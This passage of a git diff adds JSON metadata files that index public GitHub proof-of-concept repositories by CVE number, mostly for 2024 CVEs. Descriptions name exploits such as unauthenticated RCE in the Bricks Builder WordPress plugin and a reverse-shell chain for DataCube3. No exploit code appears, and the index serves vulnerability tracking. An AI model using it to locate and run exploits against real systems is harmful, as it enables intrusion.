+ "full_name": "thetrueartist\/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227",
+ "owner": {
+ "login": "thetrueartist",
+ "id": 47917137,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47917137?v=4",
+ "html_url": "https:\/\/github.com\/thetrueartist"
+ },
+ "html_url": "https:\/\/github.com\/thetrueartist\/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-13T17:58:41Z",
+ "updated_at": "2024-03-13T19:48:07Z",
+ "pushed_at": "2024-03-22T17:01:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25270.json b/2024/CVE-2024-25270.json
new file mode 100644
index 0000000000..0656b75b6a
--- /dev/null
+++ b/2024/CVE-2024-25270.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 761648221,
+ "name": "CVE-2024-25270",
+ "full_name": "fbkcs\/CVE-2024-25270",
+ "owner": {
+ "login": "fbkcs",
+ "id": 44971422,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44971422?v=4",
+ "html_url": "https:\/\/github.com\/fbkcs"
+ },
+ "html_url": "https:\/\/github.com\/fbkcs\/CVE-2024-25270",
+ "description": "for future article of research vulnerability in MIRAPOLIS LMS",
+ "fork": false,
+ "created_at": "2024-02-22T08:18:47Z",
+ "updated_at": "2024-02-22T08:18:48Z",
+ "pushed_at": "2024-02-22T08:20:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25277.json b/2024/CVE-2024-25277.json
new file mode 100644
index 0000000000..e445e2bc31
--- /dev/null
+++ b/2024/CVE-2024-25277.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 763137888,
+ "name": "CVE-2024-25277",
+ "full_name": "maen08\/CVE-2024-25277",
+ "owner": {
+ "login": "maen08",
+ "id": 48031010,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48031010?v=4",
+ "html_url": "https:\/\/github.com\/maen08"
+ },
+ "html_url": "https:\/\/github.com\/maen08\/CVE-2024-25277",
+ "description": "Resources and PoCs",
+ "fork": false,
+ "created_at": "2024-02-25T16:54:33Z",
+ "updated_at": "2024-04-23T19:11:25Z",
+ "pushed_at": "2024-04-23T19:11:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25278.json b/2024/CVE-2024-25278.json
new file mode 100644
index 0000000000..1877e3306d
--- /dev/null
+++ b/2024/CVE-2024-25278.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 758896821,
+ "name": "CVE-2024-25278",
+ "full_name": "sajaljat\/CVE-2024-25278",
+ "owner": {
+ "login": "sajaljat",
+ "id": 142223862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4",
+ "html_url": "https:\/\/github.com\/sajaljat"
+ },
+ "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25278",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-17T11:59:51Z",
+ "updated_at": "2024-02-17T11:59:51Z",
+ "pushed_at": "2024-02-17T12:08:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25279.json b/2024/CVE-2024-25279.json
new file mode 100644
index 0000000000..227199c631
--- /dev/null
+++ b/2024/CVE-2024-25279.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 758899753,
+ "name": "CVE-2024-25279",
+ "full_name": "sajaljat\/CVE-2024-25279",
+ "owner": {
+ "login": "sajaljat",
+ "id": 142223862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4",
+ "html_url": "https:\/\/github.com\/sajaljat"
+ },
+ "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25279",
+ "description": "(XSS)",
+ "fork": false,
+ "created_at": "2024-02-17T12:10:12Z",
+ "updated_at": "2024-02-17T12:10:13Z",
+ "pushed_at": "2024-02-17T12:10:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25280.json b/2024/CVE-2024-25280.json
new file mode 100644
index 0000000000..e6be312458
--- /dev/null
+++ b/2024/CVE-2024-25280.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 758900244,
+ "name": "CVE-2024-25280",
+ "full_name": "sajaljat\/CVE-2024-25280",
+ "owner": {
+ "login": "sajaljat",
+ "id": 142223862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4",
+ "html_url": "https:\/\/github.com\/sajaljat"
+ },
+ "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25280",
+ "description": "Broken Access control",
+ "fork": false,
+ "created_at": "2024-02-17T12:11:58Z",
+ "updated_at": "2024-02-17T12:13:43Z",
+ "pushed_at": "2024-02-17T12:13:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25281.json b/2024/CVE-2024-25281.json
new file mode 100644
index 0000000000..405c3650a8
--- /dev/null
+++ b/2024/CVE-2024-25281.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 758901138,
+ "name": "CVE-2024-25281",
+ "full_name": "sajaljat\/CVE-2024-25281",
+ "owner": {
+ "login": "sajaljat",
+ "id": 142223862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4",
+ "html_url": "https:\/\/github.com\/sajaljat"
+ },
+ "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25281",
+ "description": "(XSS)",
+ "fork": false,
+ "created_at": "2024-02-17T12:14:56Z",
+ "updated_at": "2024-02-17T12:14:56Z",
+ "pushed_at": "2024-02-17T12:15:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25376.json b/2024/CVE-2024-25376.json
new file mode 100644
index 0000000000..35e6cb29e3
--- /dev/null
+++ b/2024/CVE-2024-25376.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 762642991,
+ "name": "CVE-2024-25376-POC",
+ "full_name": "ewilded\/CVE-2024-25376-POC",
+ "owner": {
+ "login": "ewilded",
+ "id": 1158719,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1158719?v=4",
+ "html_url": "https:\/\/github.com\/ewilded"
+ },
+ "html_url": "https:\/\/github.com\/ewilded\/CVE-2024-25376-POC",
+ "description": "CVE-2024-25376 - Local Privilege Escalation in TUSBAudio",
+ "fork": false,
+ "created_at": "2024-02-24T09:30:45Z",
+ "updated_at": "2024-02-27T20:23:07Z",
+ "pushed_at": "2024-02-24T09:33:42Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25381.json b/2024/CVE-2024-25381.json
new file mode 100644
index 0000000000..cdb2a39f22
--- /dev/null
+++ b/2024/CVE-2024-25381.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 751326986,
+ "name": "CVE-2024-25381",
+ "full_name": "Ox130e07d\/CVE-2024-25381",
+ "owner": {
+ "login": "Ox130e07d",
+ "id": 108753162,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108753162?v=4",
+ "html_url": "https:\/\/github.com\/Ox130e07d"
+ },
+ "html_url": "https:\/\/github.com\/Ox130e07d\/CVE-2024-25381",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-01T11:42:48Z",
+ "updated_at": "2024-02-20T08:36:47Z",
+ "pushed_at": "2024-02-23T05:48:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25423.json b/2024/CVE-2024-25423.json
new file mode 100644
index 0000000000..53558e761d
--- /dev/null
+++ b/2024/CVE-2024-25423.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 759283387,
+ "name": "cve-2024-25423",
+ "full_name": "DriverUnload\/cve-2024-25423",
+ "owner": {
+ "login": "DriverUnload",
+ "id": 83060593,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83060593?v=4",
+ "html_url": "https:\/\/github.com\/DriverUnload"
+ },
+ "html_url": "https:\/\/github.com\/DriverUnload\/cve-2024-25423",
+ "description": "Cinema 4D out-of-bounds write vulnerability when parsing c4d files",
+ "fork": false,
+ "created_at": "2024-02-18T06:35:31Z",
+ "updated_at": "2024-02-18T07:10:42Z",
+ "pushed_at": "2024-02-18T07:06:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25466.json b/2024/CVE-2024-25466.json
new file mode 100644
index 0000000000..faabbb0731
--- /dev/null
+++ b/2024/CVE-2024-25466.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 757892016,
+ "name": "CVE-2024-25466",
+ "full_name": "FixedOctocat\/CVE-2024-25466",
+ "owner": {
+ "login": "FixedOctocat",
+ "id": 43385721,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43385721?v=4",
+ "html_url": "https:\/\/github.com\/FixedOctocat"
+ },
+ "html_url": "https:\/\/github.com\/FixedOctocat\/CVE-2024-25466",
+ "description": "Description for CVE-2024-25466",
+ "fork": false,
+ "created_at": "2024-02-15T07:47:14Z",
+ "updated_at": "2024-02-15T07:47:14Z",
+ "pushed_at": "2024-02-15T12:41:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25600.json b/2024/CVE-2024-25600.json
new file mode 100644
index 0000000000..e5f72b34cd
--- /dev/null
+++ b/2024/CVE-2024-25600.json
@@ -0,0 +1,320 @@
+[
+ {
+ "id": 760768451,
+ "name": "CVE-2024-25600",
+ "full_name": "Chocapikk\/CVE-2024-25600",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-25600",
+ "description": "Unauthenticated Remote Code Execution – Bricks <= 1.9.6",
+ "fork": false,
+ "created_at": "2024-02-20T20:16:09Z",
+ "updated_at": "2024-06-25T10:23:01Z",
+ "pushed_at": "2024-02-25T21:50:09Z",
+ "stargazers_count": 133,
+ "watchers_count": 133,
+ "has_discussions": false,
+ "forks_count": 31,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 31,
+ "watchers": 133,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 760947792,
+ "name": "CVE-2024-25600_Nuclei-Template",
+ "full_name": "Christbowel\/CVE-2024-25600_Nuclei-Template",
+ "owner": {
+ "login": "Christbowel",
+ "id": 96427513,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96427513?v=4",
+ "html_url": "https:\/\/github.com\/Christbowel"
+ },
+ "html_url": "https:\/\/github.com\/Christbowel\/CVE-2024-25600_Nuclei-Template",
+ "description": "Nuclei template and information about the POC for CVE-2024-25600",
+ "fork": false,
+ "created_at": "2024-02-21T00:27:33Z",
+ "updated_at": "2024-05-02T09:00:41Z",
+ "pushed_at": "2024-02-21T02:11:08Z",
+ "stargazers_count": 27,
+ "watchers_count": 27,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 27,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 761713470,
+ "name": "CVE-2024-25600-Bricks-Builder-plugin-for-WordPress",
+ "full_name": "Tornad0007\/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress",
+ "owner": {
+ "login": "Tornad0007",
+ "id": 93181695,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93181695?v=4",
+ "html_url": "https:\/\/github.com\/Tornad0007"
+ },
+ "html_url": "https:\/\/github.com\/Tornad0007\/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress",
+ "description": "This tool is designed to exploit the CVE-2024-25600 vulnerability found in the Bricks Builder plugin for WordPress. The vulnerability allows for unauthenticated remote code execution on affected websites. The tool automates the exploitation process by retrieving nonces and sending specially crafted requests to execute arbitrary commands.",
+ "fork": false,
+ "created_at": "2024-02-22T10:53:45Z",
+ "updated_at": "2024-06-13T01:54:37Z",
+ "pushed_at": "2024-02-22T10:54:26Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 765397075,
+ "name": "CVE-2024-25600-wordpress-Exploit-RCE",
+ "full_name": "hy011121\/CVE-2024-25600-wordpress-Exploit-RCE",
+ "owner": {
+ "login": "hy011121",
+ "id": 75035965,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75035965?v=4",
+ "html_url": "https:\/\/github.com\/hy011121"
+ },
+ "html_url": "https:\/\/github.com\/hy011121\/CVE-2024-25600-wordpress-Exploit-RCE",
+ "description": "(Mirorring)",
+ "fork": false,
+ "created_at": "2024-02-29T20:53:42Z",
+ "updated_at": "2024-06-16T18:49:22Z",
+ "pushed_at": "2024-02-29T21:04:40Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 765618070,
+ "name": "CVE-2024-25600-EXPLOIT",
+ "full_name": "K3ysTr0K3R\/CVE-2024-25600-EXPLOIT",
+ "owner": {
+ "login": "K3ysTr0K3R",
+ "id": 70909693,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4",
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R"
+ },
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-25600-EXPLOIT",
+ "description": "A PoC exploit for CVE-2024-25600 - WordPress Bricks Builder Remote Code Execution (RCE)",
+ "fork": false,
+ "created_at": "2024-03-01T09:28:08Z",
+ "updated_at": "2024-06-25T17:26:16Z",
+ "pushed_at": "2024-03-01T09:46:56Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bricks-builder",
+ "cve-2024-25600",
+ "educational",
+ "exploit",
+ "exploitation",
+ "exploits",
+ "hacking",
+ "poc",
+ "rce",
+ "remote-code-execution",
+ "security-research",
+ "security-researcher",
+ "vulnerabilities",
+ "vulnerability",
+ "word",
+ "wordpress",
+ "wordpress-plugin"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 789293414,
+ "name": "WORDPRESS-CVE-2024-25600-EXPLOIT-RCE",
+ "full_name": "X-Projetion\/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE",
+ "owner": {
+ "login": "X-Projetion",
+ "id": 161194427,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4",
+ "html_url": "https:\/\/github.com\/X-Projetion"
+ },
+ "html_url": "https:\/\/github.com\/X-Projetion\/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE",
+ "description": "WORDPRESS-CVE-2024-25600-EXPLOIT-RCE - WordPress Bricks Builder Remote Code Execution (RCE)",
+ "fork": false,
+ "created_at": "2024-04-20T06:36:22Z",
+ "updated_at": "2024-04-20T06:52:25Z",
+ "pushed_at": "2024-04-20T06:37:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 796124892,
+ "name": "CVE-2024-25600-mass",
+ "full_name": "RHYru9\/CVE-2024-25600-mass",
+ "owner": {
+ "login": "RHYru9",
+ "id": 164749781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164749781?v=4",
+ "html_url": "https:\/\/github.com\/RHYru9"
+ },
+ "html_url": "https:\/\/github.com\/RHYru9\/CVE-2024-25600-mass",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-05T02:18:00Z",
+ "updated_at": "2024-06-12T08:33:02Z",
+ "pushed_at": "2024-06-12T08:31:18Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809314858,
+ "name": "0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress",
+ "full_name": "ivanbg2004\/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress",
+ "owner": {
+ "login": "ivanbg2004",
+ "id": 124943966,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124943966?v=4",
+ "html_url": "https:\/\/github.com\/ivanbg2004"
+ },
+ "html_url": "https:\/\/github.com\/ivanbg2004\/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress",
+ "description": "0BL1V10N's CVE-2024-25600 for Bricks Builder (TryHackMe) plugin for WordPress exploit",
+ "fork": false,
+ "created_at": "2024-06-02T10:49:03Z",
+ "updated_at": "2024-06-03T02:45:56Z",
+ "pushed_at": "2024-06-02T11:12:04Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": true,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811133087,
+ "name": "CVE-2024-25600",
+ "full_name": "k3lpi3b4nsh33\/CVE-2024-25600",
+ "owner": {
+ "login": "k3lpi3b4nsh33",
+ "id": 118002757,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4",
+ "html_url": "https:\/\/github.com\/k3lpi3b4nsh33"
+ },
+ "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-25600",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-06T02:13:06Z",
+ "updated_at": "2024-06-06T02:36:13Z",
+ "pushed_at": "2024-06-06T02:36:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811160191,
+ "name": "CVE-2024-25600",
+ "full_name": "WanLiChangChengWanLiChang\/CVE-2024-25600",
+ "owner": {
+ "login": "WanLiChangChengWanLiChang",
+ "id": 171075497,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171075497?v=4",
+ "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang"
+ },
+ "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang\/CVE-2024-25600",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-06T03:59:06Z",
+ "updated_at": "2024-06-07T17:15:46Z",
+ "pushed_at": "2024-06-07T17:15:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25723.json b/2024/CVE-2024-25723.json
new file mode 100644
index 0000000000..8656965df2
--- /dev/null
+++ b/2024/CVE-2024-25723.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 774682652,
+ "name": "exploit-CVE-2024-25723",
+ "full_name": "david-botelho-mariano\/exploit-CVE-2024-25723",
+ "owner": {
+ "login": "david-botelho-mariano",
+ "id": 48680041,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48680041?v=4",
+ "html_url": "https:\/\/github.com\/david-botelho-mariano"
+ },
+ "html_url": "https:\/\/github.com\/david-botelho-mariano\/exploit-CVE-2024-25723",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-20T01:28:09Z",
+ "updated_at": "2024-04-10T16:58:16Z",
+ "pushed_at": "2024-04-02T20:05:58Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25731.json b/2024/CVE-2024-25731.json
new file mode 100644
index 0000000000..088f406c92
--- /dev/null
+++ b/2024/CVE-2024-25731.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 753419294,
+ "name": "com.cn.dq.ipc",
+ "full_name": "actuator\/com.cn.dq.ipc",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/com.cn.dq.ipc",
+ "description": "CVE-2024-25731",
+ "fork": false,
+ "created_at": "2024-02-06T04:38:12Z",
+ "updated_at": "2024-03-01T23:54:51Z",
+ "pushed_at": "2024-03-01T23:57:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-25731"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25733.json b/2024/CVE-2024-25733.json
new file mode 100644
index 0000000000..07d996064e
--- /dev/null
+++ b/2024/CVE-2024-25733.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 783055366,
+ "name": "ARC-Browser-Address-Bar-Spoofing-PoC",
+ "full_name": "hackintoanetwork\/ARC-Browser-Address-Bar-Spoofing-PoC",
+ "owner": {
+ "login": "hackintoanetwork",
+ "id": 83481196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83481196?v=4",
+ "html_url": "https:\/\/github.com\/hackintoanetwork"
+ },
+ "html_url": "https:\/\/github.com\/hackintoanetwork\/ARC-Browser-Address-Bar-Spoofing-PoC",
+ "description": "CVE-2024-25733 | ARC Browser Address Bar Spoofing PoC - iOS\/iPadOS",
+ "fork": false,
+ "created_at": "2024-04-06T20:18:15Z",
+ "updated_at": "2024-05-15T13:52:45Z",
+ "pushed_at": "2024-04-06T20:37:23Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25809.json b/2024/CVE-2024-25809.json
new file mode 100644
index 0000000000..9883068314
--- /dev/null
+++ b/2024/CVE-2024-25809.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 758901582,
+ "name": "CVE-2024-25809",
+ "full_name": "sajaljat\/CVE-2024-25809",
+ "owner": {
+ "login": "sajaljat",
+ "id": 142223862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4",
+ "html_url": "https:\/\/github.com\/sajaljat"
+ },
+ "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25809",
+ "description": "(XSS)",
+ "fork": false,
+ "created_at": "2024-02-17T12:16:29Z",
+ "updated_at": "2024-02-17T12:16:29Z",
+ "pushed_at": "2024-02-17T12:17:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25832.json b/2024/CVE-2024-25832.json
new file mode 100644
index 0000000000..4515bd33ba
--- /dev/null
+++ b/2024/CVE-2024-25832.json
@@ -0,0 +1,41 @@
+[
+ {
+ "id": 767883110,
+ "name": "CVE-2024-25832-PoC",
+ "full_name": "0xNslabs\/CVE-2024-25832-PoC",
+ "owner": {
+ "login": "0xNslabs",
+ "id": 122338332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122338332?v=4",
+ "html_url": "https:\/\/github.com\/0xNslabs"
+ },
+ "html_url": "https:\/\/github.com\/0xNslabs\/CVE-2024-25832-PoC",
+ "description": "PoC Script for CVE-2024-25832: Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload in DataCube3",
+ "fork": false,
+ "created_at": "2024-03-06T04:11:59Z",
+ "updated_at": "2024-03-20T18:09:07Z",
+ "pushed_at": "2024-03-06T04:32:54Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "command-injection",
+ "cve",
+ "cve-2024-25830",
+ "cve-2024-25832",
+ "exploit",
+ "iot-security",
+ "reverse-shell",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-26026.json b/2024/CVE-2024-26026.json
new file mode 100644
index 0000000000..d3f58f13ac
--- /dev/null
